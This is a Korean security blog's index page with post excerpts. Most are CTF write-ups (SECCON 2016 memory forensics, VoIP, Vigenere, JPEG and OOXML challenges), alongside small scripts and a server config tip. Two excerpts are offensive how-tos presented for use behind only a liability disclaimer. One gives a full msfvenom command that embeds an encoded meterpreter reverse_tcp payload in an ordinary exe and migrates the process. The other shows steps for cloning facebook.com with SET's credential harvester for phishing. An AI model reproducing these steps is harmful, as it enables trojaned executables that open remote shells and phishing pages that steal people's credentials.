전체 글291

• 

  seccon2016 - Memory Analysis_100 Memory Analysis100 pointsMemory Analysis Find the website that the fake svchost is accessing. You can get the flag if you access the website!!memoryanalysis.zip The challenge files are huge, please download it first. Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts filepassword: fjliejflsjiejlsiejee33cnc 이것이 문제인데 ... 파일을 받으면 이미지 파일 하나를 받을 수 있다.힌트 1번을 보면 볼라틸리티를 이용하여 푸는 것같다. 먼저 이.. Wargame/CTF(Capture The Flag) 2016. 12. 13.

• rsa.py_ctf #값넣으면 ''없애기...p = ''g =''a = ''b = '' C = ''CA = pow(C,a,p)CAB = pow(CA,b,p) print("key_is",CAB) Language 2016. 12. 12.

• 

  seccon2016 - voip_100 VoIP100 pointsVoIP Extract a voice. The flag format is SECCON{[A-Z0-9]}. 문제 데스네... 파일을 받으면 pcap파일을 받을 수 있다. 파일을 열어보면 와이어 샤크로 열리는데... RTP을 디코드 할 것이다.그럼 RTP란 뭘까?RTP란 실시간 멀티미디어 데이터의 전송을 지원하는 Real Time Protocol다. Analyze라는 메뉴에 들어가면 Decode As는 메뉴를 찾으 수있다. 메뉴를 클릭하면 위와 같은 창이 뜨는데 +라는 표시를 눌러 RTP를 등록 해주면 된다. 그 후 Telephony메뉴에서 RTP에서 Stream Analysis를 클릭하게 되면 이렇게 streaming 되는 것을 볼수있다. 저기서 플레이 streams를 클릭하면 소.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• SECCON2016 - Vigenere_100 SECCON 2016 Vigenerek: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe 문제이다. Vigenere 암호를 이용하여 풀어야 할거 같다. SECCON{ = VIGENER E p: SECCON{ }c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ |A B C D E F G H I J K L M N O P Q R S T U V W X Y Z { }--------------------------------.. Wargame/CTF(Capture The Flag) 2016. 12. 12.

• roo-me)Command & Control - level 2 -15Poin 파일을 다운 받게 되면 또잉 ch2.dmp라는 덤프파일을 얻을 수 있다.!!! 문제를 해석해보자! 정답은 워크스테이션 호스트네임(즉, 컴퓨터이름)이 정답이란다.! :) 룰루~ 그럼 해보자 필자는 strings 라는 명령어를 사용하여 풀어볼 것이다. strings ch2.dmp | grep COMPUTERNAME Wargame/CTF(Capture The Flag) 2016. 12. 12.

• 

  Hack The Vote forensic 150 - Warpspeed 문제를 다운받아 보면 이러한 사진을 받을 수 있다. 글씨가 찌그러져서 보기 힘들다... 어떻게 풀까 생각을 하면서 노가다로 하나하나 잘라서 풀어볼까 생각을 해봤지만 010editor 라는 프로그램을 이용하여 풀어보기로 했다. 이렇게 파일을 볼수가 있다. JPG.bt를 확인하여 WORD Y, WORD X의 값을 500, 500 으로 변경할것이다. 변경하여 저장을 하게 되면 이렇게 글자를 확인 할 수 있다.!!! 끄읏!!! Wargame/CTF(Capture The Flag) 2016. 11. 24.

• string filter(php) php://filter/string.rot13/resource=example.com http://php.net/manual/en/filters.string.php Security Study/Web 2016. 10. 5.

• 

  CodeGate 2013 f300 Code Gate 2013 문제를 먼저 보면 파일을 다운 받아보면 docx파일 하나다 ... 생각해보자 ?..... 이러한 문제는 ooXML(office open XML)문제일 가능성이 크다. 오피스 오픈 XML(Office Open XML, OOXML, 오픈XML)은 마이크로소프트가 추진하였으며 2006년과 2008년 두차례에 걸쳐 Ecma 인터내셔널에 유럽 표준(ECMA-376)으로, 2008년에 ISO/IEC에 국제 표준(ISO/IEC 29500)으로 승인되었다. 이 문서 규격은 문서, 프레젠테이션, 스프레드시트를 포함한다. 확장자는 .docx 또는 .docx(문서), .pptx(프레젠테이션), .xlsx(스프레드시트)로 통일되어 있다. -wiki- 먼저 docx파일을 zip으로 확장자 변경 후 확.. Wargame/CTF(Capture The Flag) 2016. 9. 23.

• 파일합치기 (악성코드있는 파일만들기) 모든 사용의 법적 책임은 사용자 본인에게 있습니다. msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe 핸들러에서 프로세스 옮기는 명령어 migrate 프로세스 넘버 ex) migrate 1111 Metasploit 2016. 5. 24.

• apmsetup에서 forbidden문제 해결 apm폴더를 들어가서 (ex)C:\APM_Setup\Server\Apache\conf) < -이렇게 들어가서 httpd.conf파일을 메모장으로 열어 아래와같이 수정해준다. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2.

• 

  가짜 facebook만들기 모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요. 먼저 Kali linux or parrot linux에서 터미널을 open setoolkit을 입력한다. 입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다. 다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 위해 3번 facebook을 만들기 위해 2번을 클릭합니다. 여기까지 하셨으면 반왔습니다. 2번을 하셨으면 IP를 입력하시면 되는데요! ip를 입력하면 이제 clone하기 위한 사이트를 입력하시면 됩니다. 저는 facebook.com을 하기위해 http://faceboo.. Metasploit 2016. 2. 11.

• 다시 블로그 활성화합니다. 대략 2개월동안 블로그를 신경쓰지 못한 것 같습니다. 다시 블로그를 활성화합니다. 다들 새해복 많이 받으시고 원하시는 바 모두 이루어 지길 바랍니다. My Story 2016. 2. 10.